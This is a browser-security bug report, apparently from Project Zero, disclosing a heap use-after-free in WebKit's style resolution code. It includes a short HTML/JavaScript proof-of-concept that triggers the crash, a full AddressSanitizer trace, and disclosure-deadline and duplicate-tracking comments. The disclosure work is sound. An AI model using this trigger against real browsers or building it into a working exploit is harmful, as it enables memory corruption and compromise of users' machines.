New issue
Advanced search Search tips
Issue 1113
Starred by 1 user
Status: Duplicate
Merged: issue 1097
Owner:
ifratric@google.com
Closed: Mar 2017
Cc:
project-...@google.com



Sign in to add a comment
 WebKit: RenderStyle::NonInheritedFlags::getValue use-after-free
Project Member Reported by ifratric@google.com, Feb 6 2017 Back to list 
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.

PoC:

=================================================================

<script>
function eventhandler() {
  var iframe = document.getElementById("iframe");
  try { div.click(); } catch(e) { }
  try { hr.prepend(meter); } catch(e) { }
  try { iframe.src = "data:text/html,foo"; } catch(e) { }
}
</script>
<iframe id="iframe" onload="eventhandler()"></iframe>
<details open="true">
<summary>
<hr id="hr">
<div id="div"></div>
</summary>
<meter id="meter">

=================================================================

ASan log:

=================================================================
==25020==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000063248 at pc 0x00010995f170 bp 0x7fff5dc33910 sp 0x7fff5dc33908
READ of size 8 at 0x608000063248 thread T0
    #0 0x10995f16f in WebCore::RenderStyle::NonInheritedFlags::getValue(unsigned long long, unsigned long long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x4316f)
    #1 0x10c125313 in WebCore::Style::TreeResolver::parentBoxStyle() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2809313)
    #2 0x10c124c8d in WebCore::Style::TreeResolver::styleForElement(WebCore::Element&, WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2808c8d)
    #3 0x10c125440 in WebCore::Style::TreeResolver::resolveElement(WebCore::Element&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2809440)
    #4 0x10c126f1f in WebCore::Style::TreeResolver::resolveComposedTree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280af1f)
    #5 0x10c127916 in WebCore::Style::TreeResolver::resolve(WebCore::Style::Change) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280b916)
    #6 0x109fe943f in WebCore::Document::recalcStyle(WebCore::Style::Change) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cd43f)
    #7 0x10a39a3d8 in WebCore::FrameView::updateLayoutAndStyleIfNeededRecursive() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e3d8)
    #8 0x1024477ca in WebKit::TiledCoreAnimationDrawingArea::flushLayers() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x4697ca)
    #9 0x10b55134b in WebCore::LayerFlushScheduler::layerFlushCallback() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c3534b)
    #10 0x7fff9d30dfc6 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa9fc6)
    #11 0x7fff9d30df36 in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa9f36)
    #12 0x7fff9d2ed539 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89539)
    #13 0x7fff9d2ece37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
    #14 0x7fff9b506934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
    #15 0x7fff9b50676e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
    #16 0x7fff9b5065ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
    #17 0x7fff91794df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
    #18 0x7fff91794225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
    #19 0x7fff91788d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
    #20 0x7fff91752367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
    #21 0x7fff96d41193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
    #22 0x7fff96d3fbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
    #23 0x101fc8b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
    #24 0x7fffa08505ac in start (/usr/lib/system/libdyld.dylib+0x35ac)

0x608000063248 is located 40 bytes inside of 88-byte region [0x608000063220,0x608000063278)
freed by thread T0 here:
    #0 0x1045c8cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
    #1 0x10761381f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191b81f)
    #2 0x10c127033 in WebCore::Style::TreeResolver::resolveComposedTree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280b033)
    #3 0x10c127916 in WebCore::Style::TreeResolver::resolve(WebCore::Style::Change) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280b916)
    #4 0x109fe943f in WebCore::Document::recalcStyle(WebCore::Style::Change) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cd43f)
    #5 0x10a39a3d8 in WebCore::FrameView::updateLayoutAndStyleIfNeededRecursive() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e3d8)
    #6 0x1024477ca in WebKit::TiledCoreAnimationDrawingArea::flushLayers() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x4697ca)
    #7 0x10b55134b in WebCore::LayerFlushScheduler::layerFlushCallback() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c3534b)
    #8 0x7fff9d30dfc6 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa9fc6)
    #9 0x7fff9d30df36 in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa9f36)
    #10 0x7fff9d2ed539 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89539)
    #11 0x7fff9d2ece37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
    #12 0x7fff9b506934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
    #13 0x7fff9b50676e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
    #14 0x7fff9b5065ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
    #15 0x7fff91794df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
    #16 0x7fff91794225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
    #17 0x7fff91788d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
    #18 0x7fff91752367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
    #19 0x7fff96d41193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
    #20 0x7fff96d3fbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
    #21 0x101fc8b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
    #22 0x7fffa08505ac in start (/usr/lib/system/libdyld.dylib+0x35ac)

previously allocated by thread T0 here:
    #0 0x1045c8790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
    #1 0x7fff948155a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
    #2 0x10761d314 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1925314)
    #3 0x1076125db in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x191a5db)
    #4 0x1075aa635 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b2635)
    #5 0x1075a9918 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b1918)
    #6 0x10bc0e029 in WebCore::RenderStyle::clonePtr(WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x22f2029)
    #7 0x10bc0dff8 in WebCore::RenderStyle::createPtr() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x22f1ff8)
    #8 0x10c0ea9e3 in WebCore::StyleResolver::styleForElement(WebCore::Element const&, WebCore::RenderStyle const*, WebCore::RenderStyle const*, WebCore::RuleMatchingBehavior, WebCore::RenderRegion const*, WebCore::SelectorFilter const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27ce9e3)
    #9 0x10c124cc9 in WebCore::Style::TreeResolver::styleForElement(WebCore::Element&, WebCore::RenderStyle const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2808cc9)
    #10 0x10c125440 in WebCore::Style::TreeResolver::resolveElement(WebCore::Element&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2809440)
    #11 0x10c126f1f in WebCore::Style::TreeResolver::resolveComposedTree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280af1f)
    #12 0x10c127916 in WebCore::Style::TreeResolver::resolve(WebCore::Style::Change) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x280b916)
    #13 0x109fe943f in WebCore::Document::recalcStyle(WebCore::Style::Change) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6cd43f)
    #14 0x10a39a3d8 in WebCore::FrameView::updateLayoutAndStyleIfNeededRecursive() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa7e3d8)
    #15 0x1024477ca in WebKit::TiledCoreAnimationDrawingArea::flushLayers() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x4697ca)
    #16 0x10b55134b in WebCore::LayerFlushScheduler::layerFlushCallback() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c3534b)
    #17 0x7fff9d30dfc6 in __CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa9fc6)
    #18 0x7fff9d30df36 in __CFRunLoopDoObservers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xa9f36)
    #19 0x7fff9d2ed539 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89539)
    #20 0x7fff9d2ece37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
    #21 0x7fff9b506934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
    #22 0x7fff9b50676e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
    #23 0x7fff9b5065ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
    #24 0x7fff91794df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
    #25 0x7fff91794225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
    #26 0x7fff91788d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
    #27 0x7fff91752367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
    #28 0x7fff96d41193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
    #29 0x7fff96d3fbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)

SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x4316f) in WebCore::RenderStyle::NonInheritedFlags::getValue(unsigned long long, unsigned long long) const
Shadow bytes around the buggy address:
  0x1c100000c5f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 06
  0x1c100000c600: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c100000c610: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x1c100000c620: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c100000c630: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x1c100000c640: fa fa fa fa fd fd fd fd fd[fd]fd fd fd fd fd fa
  0x1c100000c650: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c100000c660: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c100000c670: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x1c100000c680: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
  0x1c100000c690: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==25020==ABORTING
=================================================================


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Project Member Comment 1 by ifratric@google.com, Feb 6 2017 
WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=167884
Project Member Comment 2 by ifratric@google.com, Feb 7 2017 
Apple product security report ID: 658714421
Project Member Comment 3 by ifratric@google.com, Mar 1 2017
Mergedinto: 1097
Status: Duplicate
Project Member Comment 4 by ifratric@google.com, Apr 4 2017
Labels: -Restrict-View-Commit
Sign in to add a comment